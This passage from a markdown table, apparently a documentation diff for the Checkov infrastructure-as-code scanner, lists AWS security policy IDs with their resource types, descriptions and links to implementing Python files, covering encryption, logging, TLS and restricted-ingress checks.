aws_elasticache_security_group resources exist | Terraform | 
[ElasticacheHasSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheHasSecurityGroup.py) | +| 592 | CKV_AWS_197 | resource | AWS::AmazonMQ::Broker | Ensure MQ Broker Audit logging is enabled | Cloudformation | [MQBrokerAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/MQBrokerAuditLogging.py) | +| 593 | CKV_AWS_197 | resource | aws_mq_broker | Ensure MQ Broker Audit logging is enabled | Terraform | [MQBrokerAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerAuditLogging.py) | +| 594 | CKV_AWS_198 | resource | aws_db_security_group | Ensure no aws_db_security_group resources exist | Terraform | [RDSHasSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSHasSecurityGroup.py) | +| 595 | CKV_AWS_199 | resource | aws_imagebuilder_distribution_configuration | Ensure Image Builder Distribution Configuration encrypts AMI's using KMS - a customer managed Key (CMK) | Terraform | [ImagebuilderDistributionConfigurationEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ImagebuilderDistributionConfigurationEncryptedWithCMK.py) | +| 596 | CKV_AWS_200 | resource | aws_imagebuilder_image_recipe | Ensure that Image Recipe EBS Disk are encrypted with CMK | Terraform | [ImagebuilderImageRecipeEBSEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ImagebuilderImageRecipeEBSEncrypted.py) | +| 597 | CKV_AWS_201 | resource | aws_memorydb_cluster | Ensure MemoryDB is encrypted at rest using KMS CMKs | Terraform | [MemoryDBEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MemoryDBEncryptionWithCMK.py) | +| 598 | CKV_AWS_202 | resource | aws_memorydb_cluster | Ensure MemoryDB data is 
encrypted in transit | Terraform | [MemoryDBClusterIntransitEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MemoryDBClusterIntransitEncryption.py) | +| 599 | CKV_AWS_203 | resource | aws_fsx_openzfs_file_system | Ensure resource is encrypted by KMS using a customer managed Key (CMK) | Terraform | [FSXOpenZFSFileSystemEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/FSXOpenZFSFileSystemEncryptedWithCMK.py) | +| 600 | CKV_AWS_204 | resource | aws_ami | Ensure AMIs are encrypted using KMS CMKs | Terraform | [AMIEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AMIEncryption.py) | +| 601 | CKV_AWS_205 | resource | aws_ami_launch_permission | Ensure to Limit AMI launch Permissions | Terraform | [AMILaunchIsShared.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AMILaunchIsShared.py) | +| 602 | CKV_AWS_206 | resource | aws_api_gateway_domain_name | Ensure API Gateway Domain uses a modern security Policy | Terraform | [APIGatewayDomainNameTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayDomainNameTLS.py) | +| 603 | CKV_AWS_207 | resource | aws_mq_broker | Ensure MQ Broker minor version updates are enabled | Terraform | [MQBrokerMinorAutoUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerMinorAutoUpgrade.py) | +| 604 | CKV_AWS_208 | resource | aws_mq_broker | Ensure MQ Broker version is current | Terraform | [MQBrokerVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerVersion.py) | +| 605 | CKV_AWS_208 | resource | aws_mq_configuration | Ensure MQ Broker version is current | Terraform | 
[MQBrokerVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerVersion.py) | +| 606 | CKV_AWS_209 | resource | aws_mq_broker | Ensure MQ broker encrypted by KMS using a customer managed Key (CMK) | Terraform | [MQBrokerEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerEncryptedWithCMK.py) | +| 607 | CKV_AWS_210 | resource | aws_batch_job_definition | Batch job does not define a privileged container | Terraform | [BatchJobIsNotPrivileged.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/BatchJobIsNotPrivileged.py) | +| 608 | CKV_AWS_211 | resource | aws_db_instance | Ensure RDS uses a modern CaCert | Terraform | [RDSCACertIsRecent.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSCACertIsRecent.py) | +| 609 | CKV_AWS_212 | resource | aws_dms_replication_instance | Ensure DMS replication instance is encrypted by KMS using a customer managed Key (CMK) | Terraform | [DMSReplicationInstanceEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSReplicationInstanceEncryptedWithCMK.py) | +| 610 | CKV_AWS_213 | resource | aws_load_balancer_policy | Ensure ELB Policy uses only secure protocols | Terraform | [ELBPolicyUsesSecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBPolicyUsesSecureProtocols.py) | +| 611 | CKV_AWS_214 | resource | aws_appsync_api_cache | Ensure AppSync API Cache is encrypted at rest | Terraform | [AppsyncAPICacheEncryptionAtRest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppsyncAPICacheEncryptionAtRest.py) | +| 612 | CKV_AWS_215 | resource | aws_appsync_api_cache | Ensure AppSync API Cache is encrypted in transit | Terraform | 
[AppsyncAPICacheEncryptionInTransit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppsyncAPICacheEncryptionInTransit.py) | +| 613 | CKV_AWS_216 | resource | aws_cloudfront_distribution | Ensure CloudFront distribution is enabled | Terraform | [CloudfrontDistributionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionEnabled.py) | +| 614 | CKV_AWS_217 | resource | aws_api_gateway_deployment | Ensure Create before destroy for API deployments | Terraform | [APIGatewayDeploymentCreateBeforeDestroy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayDeploymentCreateBeforeDestroy.py) | +| 615 | CKV_AWS_218 | resource | aws_cloudsearch_domain | Ensure that CloudSearch is using latest TLS | Terraform | [CloudsearchDomainTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudsearchDomainTLS.py) | +| 616 | CKV_AWS_219 | resource | aws_codepipeline | Ensure CodePipeline Artifact store is using a KMS CMK | Terraform | [CodePipelineArtifactsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodePipelineArtifactsEncrypted.py) | +| 617 | CKV_AWS_220 | resource | aws_cloudsearch_domain | Ensure that CloudSearch is using https | Terraform | [CloudsearchDomainEnforceHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudsearchDomainEnforceHttps.py) | +| 618 | CKV_AWS_221 | resource | aws_codeartifact_domain | Ensure CodeArtifact Domain is encrypted by KMS using a customer managed Key (CMK) | Terraform | [CodeArtifactDomainEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodeArtifactDomainEncryptedWithCMK.py) | +| 619 | CKV_AWS_222 | resource | aws_dms_replication_instance | Ensure DMS replication instance gets all 
minor upgrade automatically | Terraform | [DMSReplicationInstanceMinorUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSReplicationInstanceMinorUpgrade.py) | +| 620 | CKV_AWS_223 | resource | aws_ecs_cluster | Ensure ECS Cluster enables logging of ECS Exec | Terraform | [ECSClusterLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSClusterLoggingEnabled.py) | +| 621 | CKV_AWS_224 | resource | aws_ecs_cluster | Ensure ECS Cluster logging is enabled and client to container communication uses CMK | Terraform | [ECSClusterLoggingEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSClusterLoggingEncryptedWithCMK.py) | +| 622 | CKV_AWS_225 | resource | aws_api_gateway_method_settings | Ensure API Gateway method setting caching is enabled | Terraform | [APIGatewayMethodSettingsCacheEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayMethodSettingsCacheEnabled.py) | +| 623 | CKV_AWS_226 | resource | aws_db_instance | Ensure DB instance gets all minor upgrades automatically | Terraform | [DBInstanceMinorUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceMinorUpgrade.py) | +| 624 | CKV_AWS_226 | resource | aws_rds_cluster_instance | Ensure DB instance gets all minor upgrades automatically | Terraform | [DBInstanceMinorUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceMinorUpgrade.py) | +| 625 | CKV_AWS_227 | resource | aws_kms_key | Ensure KMS key is enabled | Terraform | [KMSKeyIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KMSKeyIsEnabled.py) | +| 626 | CKV_AWS_228 | resource | aws_elasticsearch_domain | Verify Elasticsearch domain is using an up to date TLS policy | Terraform | 
[ElasticsearchTLSPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchTLSPolicy.py) | +| 627 | CKV_AWS_228 | resource | aws_opensearch_domain | Verify Elasticsearch domain is using an up to date TLS policy | Terraform | [ElasticsearchTLSPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchTLSPolicy.py) | +| 628 | CKV_AWS_229 | resource | aws_network_acl | Ensure no NACL allow ingress from 0.0.0.0:0 to port 21 | Terraform | [NetworkACLUnrestrictedIngress21.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress21.py) | +| 629 | CKV_AWS_229 | resource | aws_network_acl_rule | Ensure no NACL allow ingress from 0.0.0.0:0 to port 21 | Terraform | [NetworkACLUnrestrictedIngress21.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress21.py) | +| 630 | CKV_AWS_230 | resource | aws_network_acl | Ensure no NACL allow ingress from 0.0.0.0:0 to port 20 | Terraform | [NetworkACLUnrestrictedIngress20.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress20.py) | +| 631 | CKV_AWS_230 | resource | aws_network_acl_rule | Ensure no NACL allow ingress from 0.0.0.0:0 to port 20 | Terraform | [NetworkACLUnrestrictedIngress20.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress20.py) | +| 632 | CKV_AWS_231 | resource | aws_network_acl | Ensure no NACL allow ingress from 0.0.0.0:0 to port 3389 | Terraform | [NetworkACLUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress3389.py) | +| 633 | CKV_AWS_231 | resource | aws_network_acl_rule | Ensure no NACL allow ingress from 0.0.0.0:0 to port 3389 | Terraform | 
[NetworkACLUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress3389.py) | +| 634 | CKV_AWS_232 | resource | aws_network_acl | Ensure no NACL allow ingress from 0.0.0.0:0 to port 22 | Terraform | [NetworkACLUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress22.py) | +| 635 | CKV_AWS_232 | resource | aws_network_acl_rule | Ensure no NACL allow ingress from 0.0.0.0:0 to port 22 | Terraform | [NetworkACLUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress22.py) | +| 636 | CKV_AWS_233 | resource | aws_acm_certificate | Ensure Create before destroy for ACM certificates | Terraform | [ACMCertCreateBeforeDestroy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ACMCertCreateBeforeDestroy.py) | +| 637 | CKV_AWS_234 | resource | aws_acm_certificate | Verify logging preference for ACM certificates | Terraform | [ACMCertSetLoggingPreference.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ACMCertSetLoggingPreference.py) | +| 638 | CKV_AWS_235 | resource | aws_ami_copy | Ensure that copied AMIs are encrypted | Terraform | [AMICopyIsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AMICopyIsEncrypted.py) | +| 639 | CKV_AWS_236 | resource | aws_ami_copy | Ensure AMI copying uses a CMK | Terraform | [AMICopyUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AMICopyUsesCMK.py) | +| 640 | CKV_AWS_237 | resource | aws_api_gateway_rest_api | Ensure Create before destroy for API Gateway | Terraform | 
[APIGatewayCreateBeforeDestroy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayCreateBeforeDestroy.py) | +| 641 | CKV_AWS_238 | resource | aws_guardduty_detector | Ensure that GuardDuty detector is enabled | Terraform | [GuarddutyDetectorEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GuarddutyDetectorEnabled.py) | +| 642 | CKV_AWS_239 | resource | aws_dax_cluster | Ensure DAX cluster endpoint is using TLS | Terraform | [DAXEndpointTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DAXEndpointTLS.py) | +| 643 | CKV_AWS_240 | resource | aws_kinesis_firehose_delivery_stream | Ensure Kinesis Firehose delivery stream is encrypted | Terraform | [KinesisFirehoseDeliveryStreamSSE.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisFirehoseDeliveryStreamSSE.py) | +| 644 | CKV_AWS_241 | resource | aws_kinesis_firehose_delivery_stream | Ensure that Kinesis Firehose Delivery Streams are encrypted with CMK | Terraform | [KinesisFirehoseDeliveryStreamUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisFirehoseDeliveryStreamUsesCMK.py) | +| 645 | CKV_AWS_242 | resource | aws_mwaa_environment | Ensure MWAA environment has scheduler logs enabled | Terraform | [MWAASchedulerLogsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MWAASchedulerLogsEnabled.py) | +| 646 | CKV_AWS_243 | resource | aws_mwaa_environment | Ensure MWAA environment has worker logs enabled | Terraform | [MWAAWorkerLogsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MWAAWorkerLogsEnabled.py) | +| 647 | CKV_AWS_244 | resource | aws_mwaa_environment | Ensure MWAA environment has webserver logs enabled | Terraform | 
[MWAAWebserverLogsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MWAAWebserverLogsEnabled.py) | +| 648 | CKV_AWS_245 | resource | aws_db_instance_automated_backups_replication | Ensure replicated backups are encrypted at rest using KMS CMKs | Terraform | [RDSInstanceAutoBackupEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstanceAutoBackupEncryptionWithCMK.py) | +| 649 | CKV_AWS_246 | resource | aws_rds_cluster_activity_stream | Ensure RDS Cluster activity streams are encrypted using KMS CMKs | Terraform | [RDSClusterActivityStreamEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterActivityStreamEncryptedWithCMK.py) | +| 650 | CKV_AWS_247 | resource | aws_elasticsearch_domain | Ensure all data stored in the Elasticsearch is encrypted with a CMK | Terraform | [ElasticsearchEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchEncryptionWithCMK.py) | +| 651 | CKV_AWS_247 | resource | aws_opensearch_domain | Ensure all data stored in the Elasticsearch is encrypted with a CMK | Terraform | [ElasticsearchEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchEncryptionWithCMK.py) | +| 652 | CKV_AWS_248 | resource | aws_elasticsearch_domain | Ensure that Elasticsearch is not using the default Security Group | Terraform | [ElasticsearchDefaultSG.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDefaultSG.py) | +| 653 | CKV_AWS_248 | resource | aws_opensearch_domain | Ensure that Elasticsearch is not using the default Security Group | Terraform | [ElasticsearchDefaultSG.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDefaultSG.py) | +| 654 | 
CKV_AWS_249 | resource | aws_ecs_task_definition | Ensure that the Execution Role ARN and the Task Role ARN are different in ECS Task definitions | Terraform | [ECSTaskDefinitionRoleCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSTaskDefinitionRoleCheck.py) | +| 655 | CKV_AWS_250 | resource | aws_db_instance | Ensure that RDS PostgreSQL instances use a non vulnerable version with the log_fdw extension (https://aws.amazon.com/security/security-bulletins/AWS-2022-004/) | Terraform | [RDSPostgreSQLLogFDWExtension.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSPostgreSQLLogFDWExtension.py) | +| 656 | CKV_AWS_250 | resource | aws_rds_cluster | Ensure that RDS PostgreSQL instances use a non vulnerable version with the log_fdw extension (https://aws.amazon.com/security/security-bulletins/AWS-2022-004/) | Terraform | [RDSPostgreSQLLogFDWExtension.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSPostgreSQLLogFDWExtension.py) | +| 657 | CKV_AWS_251 | resource | aws_cloudtrail | Ensure CloudTrail logging is enabled | Terraform | [CloudtrailEnableLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailEnableLogging.py) | +| 658 | CKV_AWS_252 | resource | aws_cloudtrail | Ensure CloudTrail defines an SNS Topic | Terraform | [CloudtrailDefinesSNSTopic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailDefinesSNSTopic.py) | +| 659 | CKV_AWS_253 | resource | aws_dlm_lifecycle_policy | Ensure DLM cross region events are encrypted | Terraform | [DLMEventsCrossRegionEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DLMEventsCrossRegionEncryption.py) | +| 660 | CKV_AWS_254 | resource | aws_dlm_lifecycle_policy | Ensure DLM cross region events are encrypted with Customer Managed Key | 
Terraform | [DLMEventsCrossRegionEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DLMEventsCrossRegionEncryptionWithCMK.py) | +| 661 | CKV_AWS_255 | resource | aws_dlm_lifecycle_policy | Ensure DLM cross region schedules are encrypted | Terraform | [DLMScheduleCrossRegionEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DLMScheduleCrossRegionEncryption.py) | +| 662 | CKV_AWS_256 | resource | aws_dlm_lifecycle_policy | Ensure DLM cross region schedules are encrypted using a Customer Managed Key | Terraform | [DLMScheduleCrossRegionEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DLMScheduleCrossRegionEncryptionWithCMK.py) | +| 663 | CKV_AWS_257 | resource | aws_codecommit_approval_rule_template | Ensure CodeCommit branch changes have at least 2 approvals | Terraform | [CodecommitApprovalsRulesRequireMin2.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodecommitApprovalsRulesRequireMin2.py) | +| 664 | CKV_AWS_258 | resource | AWS::Lambda::Url | Ensure that Lambda function URLs AuthType is not None | Cloudformation | [LambdaFunctionURLAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaFunctionURLAuth.py) | +| 665 | CKV_AWS_258 | resource | aws_lambda_function_url | Ensure that Lambda function URLs AuthType is not None | Terraform | [LambdaFunctionURLAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaFunctionURLAuth.py) | +| 666 | CKV_AWS_259 | resource | aws_cloudfront_response_headers_policy | Ensure CloudFront response header policy enforces Strict Transport Security | Terraform | 
[CloudFrontResponseHeaderStrictTransportSecurity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudFrontResponseHeaderStrictTransportSecurity.py) | +| 667 | CKV_AWS_260 | resource | AWS::EC2::SecurityGroup | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80 | Cloudformation | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py) | +| 668 | CKV_AWS_260 | resource | AWS::EC2::SecurityGroupIngress | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80 | Cloudformation | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py) | +| 669 | CKV_AWS_260 | resource | aws_security_group | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80 | Terraform | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py) | +| 670 | CKV_AWS_260 | resource | aws_security_group_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80 | Terraform | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py) | +| 671 | CKV_AWS_260 | resource | aws_vpc_security_group_ingress_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80 | Terraform | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py) | +| 672 | CKV_AWS_261 | resource | aws_alb_target_group | Ensure HTTP HTTPS Target group defines Healthcheck | Terraform | 
[LBTargetGroupsDefinesHealthcheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBTargetGroupsDefinesHealthcheck.py) | +| 673 | CKV_AWS_261 | resource | aws_lb_target_group | Ensure HTTP HTTPS Target group defines Healthcheck | Terraform | [LBTargetGroupsDefinesHealthcheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBTargetGroupsDefinesHealthcheck.py) | +| 674 | CKV_AWS_262 | resource | aws_kendra_index | Ensure Kendra index Server side encryption uses CMK | Terraform | [KendraIndexSSEUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KendraIndexSSEUsesCMK.py) | +| 675 | CKV_AWS_263 | resource | aws_appflow_flow | Ensure AppFlow flow uses CMK | Terraform | [AppFlowUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppFlowUsesCMK.py) | +| 676 | CKV_AWS_264 | resource | aws_appflow_connector_profile | Ensure AppFlow connector profile uses CMK | Terraform | [AppFlowConnectorProfileUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppFlowConnectorProfileUsesCMK.py) | +| 677 | CKV_AWS_265 | resource | aws_keyspaces_table | Ensure Keyspaces Table uses CMK | Terraform | [KeyspacesTableUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KeyspacesTableUsesCMK.py) | +| 678 | CKV_AWS_266 | resource | aws_db_snapshot_copy | Ensure DB Snapshot copy uses CMK | Terraform | [DBSnapshotCopyUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBSnapshotCopyUsesCMK.py) | +| 679 | CKV_AWS_267 | resource | aws_comprehend_entity_recognizer | Ensure that Comprehend Entity Recognizer's model is encrypted by KMS using a customer managed Key (CMK) | Terraform | 
[ComprehendEntityRecognizerModelUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ComprehendEntityRecognizerModelUsesCMK.py) | +| 680 | CKV_AWS_268 | resource | aws_comprehend_entity_recognizer | Ensure that Comprehend Entity Recognizer's volume is encrypted by KMS using a customer managed Key (CMK) | Terraform | [ComprehendEntityRecognizerVolumeUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ComprehendEntityRecognizerVolumeUsesCMK.py) | +| 681 | CKV_AWS_269 | resource | aws_connect_instance_storage_config | Ensure Connect Instance Kinesis Video Stream Storage Config uses CMK | Terraform | [ConnectInstanceKinesisVideoStreamStorageConfigUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ConnectInstanceKinesisVideoStreamStorageConfigUsesCMK.py) | +| 682 | CKV_AWS_270 | resource | aws_connect_instance_storage_config | Ensure Connect Instance S3 Storage Config uses CMK | Terraform | [ConnectInstanceS3StorageConfigUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ConnectInstanceS3StorageConfigUsesCMK.py) | +| 683 | CKV_AWS_271 | resource | aws_dynamodb_table_replica | Ensure DynamoDB table replica KMS encryption uses CMK | Terraform | [DynamoDBTableReplicaKMSUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DynamoDBTableReplicaKMSUsesCMK.py) | +| 684 | CKV_AWS_272 | resource | aws_lambda_function | Ensure AWS Lambda function is configured to validate code-signing | Terraform | [LambdaCodeSigningConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaCodeSigningConfigured.py) | +| 685 | CKV_AWS_273 | resource | aws_iam_user | Ensure access is controlled through SSO and not AWS IAM defined users | Terraform | 
[IAMUserNotUsedForAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMUserNotUsedForAccess.py) | +| 686 | CKV_AWS_274 | resource | aws_iam_group_policy_attachment | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py) | +| 687 | CKV_AWS_274 | resource | aws_iam_policy_attachment | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py) | +| 688 | CKV_AWS_274 | resource | aws_iam_role | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py) | +| 689 | CKV_AWS_274 | resource | aws_iam_role_policy_attachment | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py) | +| 690 | CKV_AWS_274 | resource | aws_iam_user_policy_attachment | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py) | +| 691 | CKV_AWS_274 | resource | aws_ssoadmin_managed_policy_attachment | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py) | +| 692 | 
CKV_AWS_275 | data | aws_iam_policy | Disallow policies from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMManagedAdminPolicy.py) | +| 693 | CKV_AWS_276 | resource | aws_api_gateway_method_settings | Ensure Data Trace is not enabled in API Gateway Method Settings | Terraform | [APIGatewayMethodSettingsDataTrace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayMethodSettingsDataTrace.py) | +| 694 | CKV_AWS_277 | resource | aws_security_group | Ensure no security groups allow ingress from 0.0.0.0:0 to port -1 | Terraform | [SecurityGroupUnrestrictedIngressAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngressAny.py) | +| 695 | CKV_AWS_277 | resource | aws_security_group_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port -1 | Terraform | 